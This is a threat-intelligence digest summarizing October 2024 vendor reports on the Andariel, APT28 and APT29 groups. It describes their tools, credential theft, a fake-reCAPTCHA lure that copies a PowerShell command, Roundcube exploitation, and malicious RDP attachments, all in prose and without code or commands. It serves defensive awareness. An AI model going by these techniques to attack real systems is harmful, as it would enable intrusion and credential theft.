The following are the main APT groups and their cases based on the analysis reports released by security companies and organizations in October 2024.

 

1.   Andariel

 

Symantec’s Threat Hunter Team has found evidence that the Andariel group is launching financially motivated attacks against companies in the United States.

 

The group has continued their attacks even after the U.S. Department of Justice’s indictment in July 2024. In August, they launched attacks against three U.S. companies. All victims were private companies, and the attacks are believed to have been carried out for financial gain.

 

The attack involved two unique credentials, including a fake “Tableau” certificate, as well as the Preft and Nukebot backdoors. The Preft backdoor performs various functions such as downloading and uploading files, and executing commands. It also supports multiple plugins. The Nukebot backdoor, which was discovered for the first time in this attack, executes commands, transfers files, and takes screenshots. The attackers also used open-source and publicly available tools such as Sliver, Chisel, PuTTY, and Megatools to launch their attacks. The threat actors used two types of keyloggers. The first keylogger stole clipboard data and recorded key inputs for specific programs. The second keylogger recorded clipboard data in a randomly generated DAT file. The threat actors then used a malicious batch file to activate the plaintext credentials and extracted the credentials using Mimikatz.

 

According to Palo Alto Networks Unit 42, the Andariel group has moved away from using their custom ransomware and are now utilizing the Play ransomware’s infrastructure. It is believed that the group is acting as an Initial Access Broker (IAB) or a partner of the Play ransomware group.

 

These threat actors propagated Sliver and DTrack malware to multiple hosts via the SMB protocol. The Sliver beacon was identified until early September, after which the Play ransomware was executed. The Andariel group used secretsdump.py, a credential harvesting module of Impacket, to steal accounts.

 

While the Play ransomware group officially denied the RaaS model, it is possible that they sold the network access that Andariel had obtained as an IAB. Their Sliver C2 server went offline immediately after the ransomware was distributed.

 

This incident marks the first official collaboration between the Andariel group and an underground ransomware network, hinting at the possibility of future expansion of the North Korean hacker group’s ransomware operations.

 

 

2.  APT28

 

360 revealed that the APT28 group is launching attacks using malware such as Headlace and Masepie.

 

This attack mainly uses LNK files disguised as Windows updates or document icons to prompt the execution of BAT files through DLL hijacking. They also employ a geofencing strategy to target systems in specific regions and increase their attack success rate.

 

The Headlace malware initiates the attack through a compressed file. The compressed file contains CMD and BAT files that execute the final malware.

 

The Masepie malware uses a PowerShell script with a redirect page and LNK file to execute the malware and gain persistent control. Masepie collects system information and communicates with the C2 server to receive additional commands.

 

This multi-stage attack approach enhances the attack’s stealth and makes defense and response more difficult.

 

CERT-UA analyzed a phishing email attack that targeted a Ukrainian government agency, likely the work of the APT28 group.

 

The phishing email contains a link disguised as a Google spreadsheet. When users click the link, a window that mimics reCAPTCHA appears. Clicking the “I’m not a robot” checkbox copies a PowerShell command to the clipboard. When the user executes the copied command through PowerShell, the browser.hta file and Browser.ps1 script are downloaded and executed. The Browser.ps1 script establishes an SSH tunnel and leaks browser authentication data and other information. It also includes a step to download and execute the Metasploit program.

 

CERT-UA also analyzed another email attack that occurred in September 2024. This attack exploited the Roundcube vulnerability (CVE-2023-43770) to steal user credentials and create a filter called SystemHealthCheck. This filter automatically forwards the victim’s email content to the threat actor’s email.

 

Both of these attacks used the same server as their C&C (command and control) infrastructure. Further analysis found that over 10 government email accounts had been compromised. The threat actors not only used these accounts to collect data but also to distribute malicious emails to defense-related organizations in other countries.

 

 

3. APT29

 

Microsoft Threat Intelligence has confirmed that the Russia-based threat group APT29 has been sending spear-phishing emails to government organizations, defense, academia, and non-profit sectors in the UK, Europe, Australia, and Japan since October 22, 2024.

 

The threat actor sent malicious emails using stolen Microsoft or cloud service provider accounts.

 

In this attack, APT29 included a signed Remote Desktop Protocol (RDP) configuration file in the attachment, and when the recipient opens it, they are connected to a malicious server.

 

While this group has launched spear phishing attacks against various organizations in the past, this is the first time they have attempted to gain access using an RDP file. This attack allows the threat actor to share resources such as files, network drives, peripherals, and web authentication credentials with their server. Threat actors can install malware on the victim’s device to maintain continuous access even after the session has ended.

 

---

[1] https://symantec-enterprise-blogs.security.com/threat-intelligence/stonefly-north-korea-extortion

[2] https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomware/

[3] https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247501024&idx=1&sn=d93b1d195596dcc3d5fb41ca18006dfe

[4] https://cert.gov.ua/article/6281123

[5] https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/